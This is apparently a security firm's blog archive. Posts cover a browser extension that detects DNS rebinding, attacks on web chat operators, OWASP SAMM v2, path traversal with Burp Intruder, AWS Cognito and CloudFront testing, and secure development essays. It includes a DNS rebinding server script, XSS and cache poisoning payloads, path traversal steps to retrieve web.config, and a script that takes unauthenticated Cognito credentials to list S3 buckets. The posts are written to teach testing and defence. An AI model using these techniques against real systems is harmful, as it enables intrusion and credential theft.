Tuesday, June 30, 2020

Behave! A monitoring browser extension for pages acting as "bad boi".

Browsing: What Could Go Wrong?

There's a lot of literature about client-side attacks, but most of the focus is usually on classical malware attacks exploiting software vulnerabilities.

Malicious scripts are executed every day by thousands of people, and most of the time malware/viruses/malvertising try to exploit vulnerabilities or lure the user into installing software on their own machine, with the intent of staying undetected as long as possible in order to carry out their criminal business.
That's what AntiMalware/AntiVirus/[...] products are for.

It's the principle of minimum energy: typical malware wants comfortable, smooth, local execution.

However, there are quite a number of alternative client-side attacks with a minimal fingerprint, which tend to draw less attention and may go unnoticed in several environments.

Indeed, there's a history of such alternative attacks, such as:
  • Local Port Scan. Impact: information gathering, which can be used to perform further client-side attacks (malware) or to build a more precise unique user profile (advertising/risk analysis).
  • Cross Protocol attacks. Impact: depending on the protocol, specific features may be abused (e.g. SMTP abuse).
  • DNS rebinding. Impact: SOP bypass, resulting in reading sensitive information from internal network servers (a minimal sketch follows below).

which are not news at all. They are, indeed, quite old attacks that remain as reliable as they are difficult for browser vendors to completely "fix", because they abuse core features of the Web ecosystem.
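To make the rebinding idea concrete, here is a minimal sketch of an attacker-controlled DNS server that answers the first query for its hostname with a public IP and subsequent queries with a private one, so the browser keeps treating the origin as the same while the underlying address changes. This is an illustrative sketch only: it assumes the third-party dnslib Python library, and all addresses are made up.

import boto3  # not needed here; see imports below
from dnslib import RR, QTYPE, A
from dnslib.server import DNSServer, BaseResolver

class RebindResolver(BaseResolver):
    # First answer: the attacker's public IP; later answers: a private IP
    def __init__(self, public_ip, private_ip):
        self.public_ip = public_ip
        self.private_ip = private_ip
        self.queries = 0

    def resolve(self, request, handler):
        reply = request.reply()
        ip = self.public_ip if self.queries == 0 else self.private_ip
        self.queries += 1
        # A very low TTL forces the browser to re-resolve almost immediately
        reply.add_answer(RR(request.q.qname, QTYPE.A, rdata=A(ip), ttl=1))
        return reply

# Illustrative addresses: attacker's web server, then an internal target
resolver = RebindResolver("203.0.113.10", "192.168.0.1")
DNSServer(resolver, port=53, address="0.0.0.0").start()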

Behave! A Monitoring Extension for pages acting as "bad boi"

With those attacks in mind, we thought that, by taking advantage of the browser API at the extension layer, a browser extension might help monitor the behavior of HTML pages.
That's Behave!
Available as an extension for:

It monitors and warns if a web page performs any of the following actions:

  • Browser based Port Scan
  • Access to Private IPs
  • DNS Rebinding attacks to Private IPs
Here's Behave! pointing its finger at a malicious page, hosted on the at.tack.er host, that accesses local IPs:





Behave! Future Plans 

There's quite a number of stealthy, malicious client-side techniques, at several levels of the stack, that Behave! might monitor in the future.

Monday, May 18, 2020

Remote Working - Web Chats: Threats and countermeasures

Introduction

With recent worldwide events, a sharply increasing number of companies are offering remote services to their customers. Even traditional businesses are implementing new features, or migrating existing ones, to meet the new need for dematerialized human-to-human relationships.
Web chats are an example of such trends.

Web chats

Rich-message web chats are a common feature implemented by companies to cope with the need for social distancing, while maintaining a close relationship with customers.
An example of a rich-message web chat would be a graphical widget loaded by web site visitors to establish a chat session with a human operator, with the objective of sharing documents in a multimedia environment: users can share PDF files (e.g. personal documents, scans), video or audio files (e.g. a vocal recording of a formal declaration, acceptance of conditions and clauses for contracts, identity recognition) or even unexpected formats, to deal with the abundance of multimedia files offered by end-user environments.
To do so, the preview feature plays a crucial role.

Scenario

As shown below, a typical scenario is a web server exposing chat capabilities, allowing human operators in a trusted network (e.g. a LAN) to interact with remote customers.
Usually, customers interact with the chat using a common browser over an untrusted network (the Internet, their own device); chat operators interact with customers using a browser or the backoffice component of the web chat, which commonly offers rich features, such as document viewing, session management, multiple channels interaction and capabilities to interact with customers in an "enhanced" manner.

This article will describe several attack vectors from potentially malicious remote customers against targeted chat operators and the software they use to interact with customers: the objective of described workflows is attacking the trusted internal corporate network.



Rich data exchange interaction

Backoffice chat components try to recognize messages, files and URLs submitted by chat users, with the aim of previewing them or offering operators advanced tools to manipulate the data.
Different recognition approaches are usually in place: parsing file extensions, checking the MIME type of uploaded files, and actually reading the real content of the file before supplying it to the operator.
If the recognition procedure does not thoroughly include a secure implementation of all the mentioned approaches, chat operators and internal resources may be prone to security threats.

Threats

Web chats can accept files in several formats, sent by users (e.g. via drag & drop) or by submitting URLs.

HTML payloads

The simplest and most known attack vector is abusing the HTML parser of web chats:

Customer enters <b>ciao!</b>
Operator sees ciao!

Customer enters <script>alert("XSS!")</script>
Operator sees:
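(an alert dialog executes in the operator's backoffice)

The standard fix is to HTML-encode any customer-supplied text before it reaches the operator's view. A minimal sketch of the encoding step in Python (the rendering layer of a real chat backend will differ):

import html

def render_customer_message(raw_message):
    # Encode &, <, > and quotes so markup is displayed, not executed
    return html.escape(raw_message)

print(render_customer_message('<script>alert("XSS!")</script>'))
# Prints: &lt;script&gt;alert(&quot;XSS!&quot;)&lt;/script&gt;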


Malformed PDF file upload

User-supplied PDF files can be opened by chat operators in embedded viewers in the backoffice component of the web chat, or downloaded to their workstation within the trusted corporate network.
Such files can be a vehicle for arbitrary code (e.g. JavaScript or other active code), which can therefore be executed on the chat operator's endpoint, exploiting known vulnerabilities in the browser or in any other software used by operators to view the file.

As an example, PDF files can contain dynamic JavaScript code, very similar to how XSS attacks work:



Thus, malformed PDFs, especially if loaded with an outdated Adobe Acrobat version, can be an attack vector for further exploits (e.g. Meterpreter payloads, malware, droppers...) against the internal network, the browser, the operating system or other components in the trusted backoffice environment.

Note: any security concern about PDF files should be extended to Office documents (Word, Excel, PowerPoint), especially if older and/or non-hardened versions of Microsoft Office are in use.
For example, threats may include malware embedded in Office documents or CSV formula injection attacks.

Malicious URLs (Abusing preview feature)

Web chats try to parse URLs pasted into users' messages, with the aim of previewing their content.
If the parsing procedure is executed correctly, the PDF is previewed by an embedded viewer, which can therefore lead to the scenarios described above.
Conversely, if the parsing procedure is not executed correctly, the preview mechanism (triggered by the mere presence of the ".PDF" string in the URL) can lead to unexpected events.

For example, if the URL ends with the ".pdf" string, the web chat may attempt to dynamically load a preview module. As shown below, ".pdf" in the URL does not indicate a real PDF file, but a folder named ".pdf" on an arbitrary web server.

Content of the attacker's web site:


$ ls ./.pdf -1
minded (executable file)
minded.html (malicious HTML file)
minded.pdf (malicious PDF file)
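The flaw boils down to trusting the URL string instead of the content actually served. A hedged sketch of the difference (the helper names and URL are hypothetical; a real preview module would be more involved):

import requests

def looks_like_pdf_naive(url):
    # What the vulnerable preview does: trust the URL suffix
    return url.lower().endswith(".pdf")

def is_really_pdf(url):
    # Safer: check what the server actually declares for that resource
    resp = requests.head(url, allow_redirects=True, timeout=10)
    return resp.headers.get("Content-Type", "").startswith("application/pdf")

# "http://attacker.example/.pdf" passes the naive check,
# even though it is a directory, not a PDF document.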


Behaviour of the preview on chat operator's software:



Several social engineering scenarios can be built on top of this behaviour, for example convincing the chat operator (whose job is to interact efficiently with a customer) to download other files.

Semi-automatic scenarios, on the other hand, can include the execution of arbitrary code in HTML files, abusing the preview feature. For example, it would be possible to spawn a BeEF HTML hook against the browser used by the chat operator:



The command & control server (used by the attacker / evil customer) would look similar to the following:



Consequently, the attacker can use a wide range of social engineering / hijacking techniques.

For example, spawning fake system messages / Java Applet load requests:



Or even spawning fake Clippy Office Assistants:



Embedded players

Web chats may also include MP3 players which, depending on the library used by the chat software, may be prone to vulnerabilities related to outdated software modules.



Mitigations

  • Validate any uploaded file according to a predefined list of expected file types (see the sketch after this list):
- Extension
- Content Type
- Actual content of the file
  • Rescale / resize any multimedia file with a 1:1 ratio before allowing chat operators to open it, in an attempt to remove any metadata
  • Proper hardening procedures should be applied to any software used by chat operators:
- Update PDF viewer software to the latest available version
- Apply proper security options (e.g. Enhanced security and protected mode in Adobe Acrobat) to harden PDF viewer software
  • Define a list of allowed file types for the preview feature, avoiding any other format: if chat operators are expected to receive only URLs, documents and images, define a list where only PDFs and JPGs/PNGs are allowed, while any other extension is excluded from previewing components.
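As a sketch of the first mitigation, the three checks can be combined so that a file is accepted only when its extension, declared Content-Type and actual content all agree. The allow-list below is a hypothetical example covering the formats mentioned above:

import os

# Hypothetical allow-list: extension -> (expected Content-Type, magic bytes)
ALLOWED = {
    ".pdf": ("application/pdf", b"%PDF"),
    ".png": ("image/png", b"\x89PNG"),
    ".jpg": ("image/jpeg", b"\xff\xd8\xff"),
}

def is_upload_allowed(filename, declared_type, data):
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        return False                     # unexpected extension
    expected_type, magic = ALLOWED[ext]
    if declared_type != expected_type:
        return False                     # declared MIME type disagrees
    return data.startswith(magic)        # actual content must match too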

References

https://acrobatusers.com/assets/collections/tutorials/legacy/tech_corners/javascript_corner/tips/2006/popup_windows_part2/AlertBoxExamples.pdf
https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/enhanced.html
https://owasp.org/www-community/attacks/CSV_Injection
https://beefproject.com/

Thursday, April 30, 2020

OWASP SAMM v2: lessons learned after 9 years of assessment


OWASP SAMM v2 is out!


OWASP SAMM (Software Assurance Maturity Model) is the OWASP framework to help organizations assess, formulate, and implement, through our self-assessment model, a strategy for software security that can be integrated into their existing Software Development Lifecycle (SDLC).

The new OpenSAMM


The original model, OpenSAMM 1.0, was written by Pravir Chandra and dates back to 2009. Over the last 10 years, it has proven to be a widely distributed and effective model for improving secure software practices in different types of organizations. With SAMM v2, further improvements have been made to address some of its perceived limitations.

For those organizations using earlier versions of SAMM, it is important to take the time to understand how the framework has evolved in favor of automation and better alignment with development teams.

The new model supports maturity measurements from both coverage and quality perspectives, and adds new quality criteria for all the activities. There is an updated SAMM scoring toolbox designed to help assessors and organizations with their software assurance assessments and roadmaps.

What about your development models?


The new SAMM model is development paradigm agnostic. It supports waterfall, iterative, agile, and DevOps development. The model is flexible enough to allow organizations to take a path based on their risk tolerance and the way they build and use software. The model is built upon the core business functions of software development, with security assurance practices.

What’s changed with SAMM v2?


Version 2.0 of the model now supports frequent updates through small incremental changes on specific parts of the model, with regular updates to explanations, tooling, and guidance by the community.

The 3 maturity levels remain as they were. Level 1 is initial implementation; level 2, structured realization; and level 3, optimized operation.

This is the updated SAMM version 2 model:





The major changes are the following:

    - From 4 to 5 business functions and from 12 to 15 Security Practices.
    - The 4 business functions of version 1.5 now become 5 core business functions:

    - Governance
    - Design (which used to be Construction)
    - Implementation
    - A redesigned Verification function
    - Operations

    - Implementation is new, and represents a number of core activities in the build and deploy domains of an organization. It also includes a new security practice that deals with Defect Management, i.e. the fixing process.
    - The new security practices are: Secure Build, Secure Deployment, Defect Management, Architecture Analysis, and Requirements-driven Testing.
    - A new concept, called Streams, appears with version 2: activities are now presented in logical flows throughout each of the (now 15) security practices, divided into two streams, which align and link the activities in a practice over the different maturity levels. Each stream has an objective that can be reached at increasing levels of maturity.

    - The model now supports maturity measurements from both a coverage and a quality perspective. There are new quality criteria for all the SAMM activities, and an updated scoring model to help SAMM assessors and organizations with their software assurance.

What we learned in the last 9 years of assessments

Minded Security has performed many Software Security Assessments based on SAMM v1 and v1.5. The following diagram shows the results of the assessments:



We collected SAMM assessment results performed up to 2012 (blue line), from 2013 to 2015 (orange line), and from 2016 to 2018 (gray line).

As you can see from the 2012 results, the first answer of a company to software security issues is: testing, testing, testing!

What we learned during these years is that testing is NOT the solution to Software Security. Testing is just one part of your Software Security journey.

The security efforts of software developers are currently being stymied by time constraints, complexity, and deployment frequency.

The timeline for reporting and fixing critical vulnerabilities – up to one month to share, up to six months to fix – remains unacceptably long.

Today we need instant security feedback: key to achieving a fix within hours of discovery are new standards, more automation, and promptly sharing vulnerability information internally.

That's why you need to improve all the security practices of the SAMM model in order to manage Software Security properly. A SAMM assessment gives you a complete view of the problem: today the SAMM framework has become crucial for building an efficient, solid Software Security Roadmap within companies.





Tuesday, March 17, 2020

How to Path Traversal with Burp Community Suite


Introduction


A well-known, never-out-of-fashion and high-impact vulnerability is Path Traversal. This technique is also known as the dot-dot-slash attack (../) or directory traversal, and it consists in exploiting insufficient security validation/sanitization of user input, which the application uses to build pathnames to retrieve files or directories from the part of the file system located underneath a restricted parent directory.
By manipulating the values with special characters, an attacker can cause the pathname to resolve to a location outside of the restricted directory.
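As an illustration (not tied to any specific application), compare a vulnerable pathname construction with one that canonicalizes the path and re-checks that it still lies under the restricted parent directory:

import os

BASE_DIR = "/var/www/app/files"   # hypothetical restricted parent directory

def read_file_insecure(user_path):
    # VULNERABLE: "../" sequences in user_path escape BASE_DIR
    with open(os.path.join(BASE_DIR, user_path)) as f:
        return f.read()

def read_file_secure(user_path):
    # Resolve the final pathname, then verify it is still under BASE_DIR
    full = os.path.realpath(os.path.join(BASE_DIR, user_path))
    if not full.startswith(os.path.realpath(BASE_DIR) + os.sep):
        raise ValueError("path traversal attempt")
    with open(full) as f:
        return f.read()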

In OWASP terms, a path traversal attack falls under category A5 of the OWASP Top 10 (2017): Broken Access Control, so as one of the Top 10 issues of 2017 it deserves special attention.

In this blog post we will explore an example of web.config exfiltration via path traversal using Burp Suite Intruder Tool.

Previous posts about path traversal:
How to prevent Path Traversal in .NET
From Path Traversal to Source Code in Asp.NET MVC Applications

Testing Step-by-Step

First, get a copy of Burp Suite Community Edition, a useful testing tool that provides many automated and semi-automated features to improve security testing performance.
In particular, the Burp Intruder feature can be very useful to exploit path traversal vulnerabilities.

Suppose there's a .NET web application vulnerable to path traversal. In order to exploit the issue, the attacker can try to download the whole source code of the application by following this tutorial.

Once the attacker finds a server endpoint that might be vulnerable to Path Traversal, it's possible to send it to Burp Intruder, as shown in the following screenshot.



On the Intruder tab, the target has been set with the request that will be manipulated in order to find the web.config file.

Make sure that the payload is correctly injected at the right attribute position; if not, perform a "Clear §" action, then select the attribute to fuzz and click the "Add §" button.



To set the payloads that Burp Intruder will use to perform the requests, download the file traversals-8-deep-exotic-encoding.txt from the fuzzdb project and provide it to Burp Intruder by executing the following actions:
  • go to the "Payloads" sub-tab;
  • select the value "Simple List" from the "Payload type" dropdown list;
  • in the "Payload Options" panel, click the "Load..." button and select the path traversal fuzzing file (as shown in the following screenshot).


The next step is to add a Payload Processing rule in order to match and replace the placeholder "{FILE}" with the filename we want to exfiltrate (in our example, "web.config"), so click the "Add" button.



In the payload processing rule modal, set the Match string to "{FILE}" and the Replace string to "web.config", as shown in the following screenshot:


To improve the probability of a successful attack, it is possible to add a Grep-Match value (if known), so that positive responses can be easily identified.

Remove all already existing rules:



Then add a new Grep-Match rule for the "<configuration>" string, which indicates that the web.config file has been found.




Finally, it's suggested to tune the Request Engine options based on web server limitations (anti-throttling, firewall systems, etc.) in order to avoid false negatives, for example by increasing the retry delay.




Let's launch the attack. 

If the endpoint is vulnerable to path traversal, the "configuration" column will show a checkmark for the successful payloads.
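For reference, the same workflow can be approximated with a short script. The endpoint below is hypothetical; the payload file and the Grep-Match string are the ones used in the steps above:

import requests

TARGET = "https://victim.example/download?file="   # hypothetical vulnerable endpoint

with open("traversals-8-deep-exotic-encoding.txt") as f:
    payloads = [line.strip().replace("{FILE}", "web.config")
                for line in f if line.strip()]

for payload in payloads:
    resp = requests.get(TARGET + payload, timeout=10)
    if "<configuration>" in resp.text:   # same Grep-Match rule as above
        print("Possible hit: %s" % payload)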



Friday, February 14, 2020

A practical guide to testing the security of Amazon Web Services (Part 3: AWS Cognito and AWS CloudFront)

This is the last part of our three-post journey discussing the main Amazon Web Services and their security.

In the previous two parts we discussed two of the most used Amazon services, namely AWS S3 and AWS EC2. If you still haven't checked them, you can find them here: Part 1 and Part 2.

In this final post we discuss two additional services that you might encounter when analyzing the security of a web application: AWS Cognito and AWS CloudFront.
These are two very different services, supporting web applications in two specific areas:

  • AWS Cognito aims at providing an access control system that developers can implement in their web applications. 
  • AWS CloudFront is a Content Delivery Network (CDN) that delivers your data to the users with low latency and high transfer speed.


AWS Cognito

It provides developers with an authentication, authorization and user management system that can be implemented in web applications, and it is divided into two components:

  • user pools;
  • identity pools. 
Quoting AWS documentation on Cognito:
User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.
From a security perspective, we are particularly interested in identity pools as they provide access to other AWS services we might be able to mess with.

Identity pools are identified by an ID that looks like this:
 us-east-1:1a1a1a1a-ffff-1111-9999-12345678

A web application will then query AWS Cognito by specifying the proper Identity pool ID in order to get temporary limited-privileged AWS credentials to access other AWS services.

An identity pool also allows specifying a role for users that are not authenticated.
Amazon documentation states:
Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login.




This is clearly something worth checking during the assessment of a web application that takes advantage of AWS Cognito.

In fact, let's consider the following scenario: a web application allows access to AWS S3 buckets upon proper authentication, with the identity pool providing temporary access to the bucket.

Now suppose that the identity pool has also been configured to grant access to unauthenticated identities with the same privileges of accessing AWS S3 buckets.

In such a situation, an attacker will be able to access the application's AWS credentials.

The following Python script will try to get unauthenticated credentials and use them to list the AWS S3 buckets.

In the following script, just replace IDENTITY_POOL with the Identity Pool ID identified during the assessment. 


# NB: This script requires boto3.
# Install it with:
# sudo pip install boto3
import boto3
from botocore.exceptions import ClientError

try:
    # Get temporary credentials for an unauthenticated identity
    client = boto3.client('cognito-identity', region_name="us-east-2")
    resp = client.get_id(IdentityPoolId=IDENTITY_POOL)  # replace IDENTITY_POOL

    print("\nIdentity ID: %s" % resp['IdentityId'])
    print("\nRequest ID: %s" % resp['ResponseMetadata']['RequestId'])
    resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])
    secretKey = resp['Credentials']['SecretKey']
    accessKey = resp['Credentials']['AccessKeyId']
    sessionToken = resp['Credentials']['SessionToken']
    print("\nSecretKey: %s" % secretKey)
    print("\nAccessKey ID: %s" % accessKey)
    print("\nSessionToken %s" % sessionToken)

    # Use the credentials to list all bucket names
    s3 = boto3.resource('s3', aws_access_key_id=accessKey,
                        aws_secret_access_key=secretKey,
                        aws_session_token=sessionToken,
                        region_name="eu-west-1")
    print("\nBuckets:")
    for b in s3.buckets.all():
        print(b.name)

except (ClientError, KeyError):
    print("No Unauth")
    exit(0)




If unauthenticated user access to AWS S3 buckets is allowed, your output should look something like this:


Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944

Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793

SecretKey: wJE/[REDACTED]Kru76jp4i

AccessKey ID: ASI[REDACTED]MAO3

SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF

Buckets:
mindeds3log
mindeds3test01



AWS CloudFront

AWS CloudFront is Amazon's answer to a Content Delivery Network service, whose purpose is to improve the performance of delivering content from web applications.
The following images depict the basics of how CloudFront works.



The browser requests resource X from the edge location.
If the edge location has a cached copy of resource X it simply sends it back to the browser.

The following picture describes what happens if resource X is not cached in the edge location.





  • The browser requests resource X to the edge location which doesn't have a cached version. 
  • The edge location thus requests resource X from its origin, meaning the place where the original copy of resource X is stored. (This is decided when configuring CloudFront for a given domain.)
  • The origin location can be, for example, an Amazon service such as an S3 bucket, or a different server not being part of Amazon. 
  • The edge location receives resource X and stores it in its cache for future use and finally sends it back to the browser. 

This simple caching mechanism can be very helpful when it comes to improving the performance of querying a web application, but it might also hide some unwanted behavior.

As recently shown by James Kettle, web applications relying on cache for dynamic pages should be aware of the possibility of abusing such caching functionality to deliver malicious content to users, a.k.a. cache poisoning.
Briefly, as described by Kettle in his post, web cache systems need a way to uniquely identify a request, so that they don't keep contacting the origin location.
To do so, a few parts of an HTTP request are used to fully identify the request; these are called cache keys. Whenever a cache key changes, the caching system considers it a different request and, if it doesn't have a cached copy, contacts the origin location.
The basic idea behind web application cache poisoning is to find an HTTP parameter that is not a cache key and that can be used to manipulate the content of a web page. When such a parameter is found, an attacker might be able to cache a request containing a malicious payload for that parameter; whenever other users perform the same request, the caching system will answer with the cached version containing the malicious payload.

Let's consider the following simple request taken from James' post:


GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.png" />



The value of X-Forwarded-Host has been used to generate an Open Graph URL inside a meta tag in the HTML of the web page. By replacing canary with a."><script>alert(1)</script> it's possible to mess with the HTML and generate an alert box.


GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>



HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>/cms/social.png" />

However, in this case, X-Forwarded-Host is not used as a cache key. This means that it is possible to cache the request containing the alert code so that it will be served to other users in the future. As becomes clear from James' post, X-Forwarded-Host and X-Forwarded-Server are two widely used HTTP headers that do not contribute to the set of cache keys and are valuable candidates for cache poisoning attacks. James has also developed a Burp plug-in called param-miner that can be used to identify HTTP parameters that are not used as cache keys.
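A quick manual probe for an unkeyed header can be sketched as follows. The target URL is the example above; using a fresh cache-buster value guarantees we are seeding a brand-new cache entry:

import random
import requests

url = "https://www.redhat.com/en"
buster = str(random.randint(0, 10**8))   # fresh value -> fresh cache entry

# 1. Seed the cache while sending the canary in the candidate header
requests.get(url, params={"cb": buster},
             headers={"X-Forwarded-Host": "canary"})

# 2. Replay the same keyed request WITHOUT the header
resp = requests.get(url, params={"cb": buster})
if "canary" in resp.text:
    print("X-Forwarded-Host looks unkeyed: the poisoned response was cached")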

Conclusion

This post concludes our journey into the main Amazon Web Services and how to account for them when testing the security of web applications.
It is undeniable that AWS provides a comprehensive solution that companies can take advantage of, instead of having to take care of the entire infrastructure by themselves. However, companies are still the ones in charge of managing the configurations of the services they decide to use. It thus becomes crucial to test and verify such configurations.

Thursday, April 11, 2019

Secure Development Lifecycle: the SDL value evolution. Part 1

Observability and metrics paradox
It is also about observability: "If a tree falls in a forest and no one is around to hear it, does it make a sound?" Or: what is the return (in dollars) of having a better SDL in place if your company wasn't shaken by cybersecurity incidents? I see a little paradox here: after spending a big budget on security you cannot measure the returns; even more, the returns are less visible, because you don't have incidents in the first place. And if incidents do happen, then "someone saves you": you may have prevented 9 out of 10 incidents, but it is difficult to make a counterfactual argument at that point.
Oh yes, if you had big problems in the past you can then see the statistical improvements over time, as Microsoft did.


From: https://www.owasp.org/images/9/92/OWASP_SwSec5D_Presentation_-_Oct18.pdf
Microsoft case teaches
Microsoft had a nice market position and dealt with security in the early 2000s. Not every company has a de facto monopoly in the market: your company has competitors and alternatives, and needs reputation... and let's not dig too deep into cyber-fine scenarios.
In the early 2000s MS put great effort into defining and applying its SDL, and the MS SDL is still the reference implementation today. That was the genesis of the SDL as we know it; practices like STRIDE Threat Modeling are de facto standards in the industry.
Fortunately, the metrics paradox is being weakened by the fact that the SDL is becoming a value in itself: something that can be shown, that completes quality, that enhances reputation and marketing, and that is substance more than form (not only compliance). We'll see how security principles are taking over formal compliance checklists.
Dear <big tech firm here>, can I evaluate your Secure Development Lifecycle?
Supply chain customers are starting to demand a secure process itself, not only secure products and certifications (assuming that is even plausible). An example is the UK Government's relationship with Huawei, but I'm confident others will follow. The next extract is from the Huawei Cyber Security Evaluation Centre Oversight Board: Annual Report 2019:
“3.35 …analysed the adherence of the product to part of Huawei’s own secure coding guidelines, namely safe memory handling functions. … analysed for the use … of memcpy()-like, strcpy()-like and sprintf()-like functions in their safe and unsafe variants.”
Not many companies with some complexity and history could quietly survive a similar analysis.
Principles-based practices and cyber-environmental safety requirements
The security demand cannot be met only by compliance requirements. Compliance, in its various forms (PCI, ISO xxxx), is still a necessary "sine qua non" condition, but customers and counterparties demand more substance behind it. We can observe this "substance winning over form", for example, in GDPR as a principles-based regulation, as well as in the demand for security process results from key vendors (see the Huawei report from the UK cybersecurity government agency).
From Wikipedia, on GDPR: "Controllers of personal data must put in place appropriate technical and organisational measures to implement the data protection principles."
With that clear in mind, it doesn't take long to forecast that an enterprise investing in security principles and a substantial SDL will have a double advantage: the genesis/primordial one, a more secure product (e.g. MS in 2002), but also a newer one coming from visibility, which customers now demand more and more.
The SDL was a means to a more secure product; today, even more, it is becoming a company "value", something in the realm of morality and ethics, not so different from environmental sustainability. Also, the earlier a company sits in the supply chain (hardware, operating systems, authentication servers, payment gateways, dev frameworks), the more it should care, as the bigger the damage it can do to the information technology environment. The last few years' Spectre, Heartbleed, EternalBlue, BIOS and software-update security incidents are just a few examples of pollution of the supply chain.
Metrics transformation: lead vs lag indicators
Take this example of metrics:
“the percentage of people wearing hard hats on a building site is a leading safety indicator. A lagging indicator is an output measurement, for example; the number of accidents on a building site is a lagging safety indicator.”
From: https://www.intrafocus.com/lead-and-lag-indicators/
As security development practices evolve, the same should happen to the related metrics. Formal compliance frameworks and the lack of severe incidents may have been enough in the past, but neither happens before software development itself: they are lagging indicators. Leading indicators, on the other hand, are measured during the SDL; leading efforts can be measured both as resource expenditure and by assessing maturity levels, better both.
After all, would you trust a nuclear power plant just because it is law-compliant and had no incidents in the last 10 years, even IF it doesn't spend a buck on security? Let's put it this way: our planes and power plants run a lot of software, as will our future medical machines, human- and self-driven cars, etc... I want to see organizations passionately investing in security, in the smartest and most efficient way, please!
In the next part(s) I want to dig deeper into the evolution of SDL practices in the cyber security market.

Secure Development Lifecycle: the SDL value evolution. Part 2

Evolution of SDL practices: from custom to product to service
The increasing visibility trend discussed in Part 1 is, of course, impacting current cybersecurity practices in terms of maturity and evolution, also toward a "service".
Organisations consist of value chains comprised of components that evolve from genesis to more of a commodity. It sounds like fairly basic stuff, but it has profound effects, because that journey of evolution involves changing characteristics.
The following is a Wardley Map (product evolution/visibility graph) comparing Penetration Testing (PT, more of a reacting activity) and SDL (preventing vulnerabilities):



The previous example is a comparison over time (say, 10 years) of two of the most common practices in cybersecurity. Penetration Testing (PT) went from a custom-made exercise, to a product, and is now shifting to a commodity (PT as a service, crowdsourced bug bounties, etc.), whereas the "prevent" activity, the SDL, is gaining the shape of a product and, finally, more visibility, which, by the way, means money.
Pushing security left in the lifecycle, but also pushing up in visibility


from: https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95

The "Pushing left, like a boss" series explains the "how to prevent better" part very well, but the map of the evolution of the SDL also shows the point discussed in Part 1 of this article: the visibility value of having an SDL.
The birth of a new language is the result (for some, the cause) of this "pushing left". DevSecOps is nowadays the term used to express this fact. "Threat Model" is another term gaining traction.
DevSecOps implies that the "security guys" will work together with the developers, and also that developers will be more involved in security practices. I think this is a real advancement in the SDL field. Of course, vendors will overload this term with fancy product associations; that is always to be expected... we know that Dev*Ops is a principle/value more than a bunch of products.
On the contrary, PenTest (black-box testing, often disconnected from the SDL, non-automated, a single point-in-time activity) will have a hard time in the near future in an educated SDL environment. Will rules-based compliance follow this trend soon? I don't know the answer. But if you think you need a PenTest... most likely you need even more to mature your SDL!
Security says yes!
DevSecOps values push toward software evolution (CD: continuous delivery of new features), automation and quality (continuous integration). It is fertile ground for increasing the maturity of the SDL. Investing in the SDL also means more functional products in the short/medium term, not only more secure and less risky ones. Of course, the challenge is to transform a legacy product/team toward this more integrated approach. Intrinsic problems, like the lack of specific expertise in the market, still plague the cybersecurity and SDL sector. It is also something that cannot be implemented in a "few weeks". Defining a custom plan (also called a programme or roadmap) based on maturity models like OWASP SAMM and OWASP 5D, made up of incremental enhancements over time, has been successful in several organizations. It may take years, but there are not many shortcuts.